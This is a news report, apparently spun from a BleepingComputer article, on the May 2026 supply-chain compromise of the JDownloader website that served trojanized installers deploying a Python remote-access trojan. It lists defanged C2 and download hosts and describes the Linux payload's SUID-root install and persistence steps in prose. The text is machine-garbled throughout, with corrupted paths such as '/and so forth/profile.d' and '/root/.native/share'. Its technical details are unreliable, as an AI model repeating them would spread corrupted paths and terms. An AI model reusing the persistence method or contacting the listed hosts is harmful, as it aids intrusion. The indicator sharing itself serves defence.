The web site for the favored JDownloader obtain supervisor was compromised earlier this week to distribute malicious Home windows and Linux installers, with the Home windows payload discovered deploying a Python-based distant entry trojan.
The provision chain assault impacts those that downloaded installers from the official web site between Could 6 and Could 7, 2026 through the Home windows “Obtain Different Installer” hyperlinks or the Linux shell installer.
In keeping with the builders, the attackers modified the web site’s obtain hyperlinks to level to malicious third-party payloads fairly than official installers.
JDownloader is a broadly used free obtain administration utility that helps automated downloads from file-hosting providers, video websites, and premium hyperlink mills. The software program has been obtainable for greater than a decade and is utilized by tens of millions worldwide throughout Home windows, Linux, and macOS.
The JDownloader provide chain assault
The compromise was first reported on Reddit by a consumer named “PrinceOfNightSky,” who seen that downloaded installers have been being flagged by Microsoft Defender.
“I been utilizing Jdownloader and switched to a brand new PC just a few weeks in the past. Fortunately I had the installer in a usb drive however determined to obtain the newest model,” posted PrinceOfNightSky to Reddit.
“The web site is official however all of the Exes for home windows are being reported as malicious software program by home windows and the developer is being listed as ‘Zipline LLC.’ And different occasions it is saying ‘The Water Staff’ The software program is clearly by Appwork and I’ve to manually unblock it from home windows to run it which I can’t do.”
The JDownloader builders later confirmed that the positioning had been compromised and took the web site offline to research the incident.
In an incident report, the devs stated their web site was compromised by attackers exploiting an unpatched vulnerability that allowed them to alter web site entry management lists and content material with out authentication.
“Modifications have been made by means of the web site’s content material administration system, affecting printed pages and hyperlinks,” reads the incident report.
“The attacker didn’t achieve entry to the underlying server stack — specifically no entry to the host filesystem or broader operating-system-level management past CMS-managed internet content material.”
The builders acknowledged that the compromise affected solely the choice Home windows installer obtain hyperlinks and the Linux shell installer hyperlink. In-app updates, macOS downloads, Flatpak, Winget, Snap packages, and the primary JDownloader JAR bundle weren’t modified.
The builders additionally stated that customers can verify if an installer is official by right-clicking the file, deciding on Properties, after which clicking the Digital Signatures tab.
If Digital Signatures exhibits it was signed by “AppWork GmbH,” then it’s official. Nonetheless, if the file isn’t signed or is by a unique title, it ought to be averted.
Supply: BleepingComputer
The JDownloader group stated that analyzing the malicious payloads was “out of our scope,” however shared an archive of the malicious installers in order that others might analyze them.
Cybersecurity researcher Thomas Klemenc analyzed the malicious Home windows executables and shared indicators of compromise (IOCs) for the malware.
In keeping with Klemenc, the malware acts as a loader that deploys a closely obfuscated Python-based RAT.
Klemenc stated the Python payload acts as a modular bot and RAT framework, permitting attackers to execute Python code delivered from the command and management (C2) servers.
The researcher additionally shared two command and management servers utilized by the malware:
https://parkspringshotel[.]com/m/Lu6aeloo.php
https://auraguest[.]lk/m/douV2quu.php
BleepingComputer’s evaluation of the modified Linux shell installer discovered malicious code injected into the script that downloads an archive from ‘checkinnhotels[.]com’ disguised as an SVG file.
Supply: BleepingComputer
As soon as downloaded, the script extracts two ELF binaries named ‘pkg` and `systemd-exec` after which installs ‘systemd-exec’ as a SUID-root binary in ‘/usr/bin/’.
The installer then copied the primary payload to ‘/root/.native/share/.pkg’, created a persistence script in ‘/and so forth/profile.d/systemd.sh’, and launched the malware whereas masquerading as ‘/usr/libexec/upowerd`.
The ‘pkg’ payload can also be closely obfuscated utilizing Pyarmor, so it’s unclear what performance it performs.
JDownloader says customers are solely in danger in the event that they downloaded and executed the affected installers whereas the positioning was compromised.
As arbitrary code might have been executed by the malware on contaminated gadgets, those that put in the malicious installers are suggested to reinstall their working methods.
Additionally it is attainable that credentials have been compromised on gadgets, so it’s strongly suggested to reset passwords after cleansing the gadgets.
Hackers have more and more focused the web sites of in style software program instruments this yr to distribute malware to unsuspecting customers.
In April, hackers compromised the CPUID web site to alter obtain hyperlinks that served malicious executables for the favored CPU-Z and HWMonitor instruments.
Earlier this month, risk actors compromised the DAEMONTOOLS web site to distribute trojanized installers containing a backdoor.
AI chained 4 zero-days into one exploit that bypassed each renderer and OS sandboxes. A wave of recent exploits is coming.
On the Autonomous Validation Summit (Could 12 & 14), see how autonomous, context-rich validation finds what’s exploitable, proves controls maintain, and closes the remediation loop.
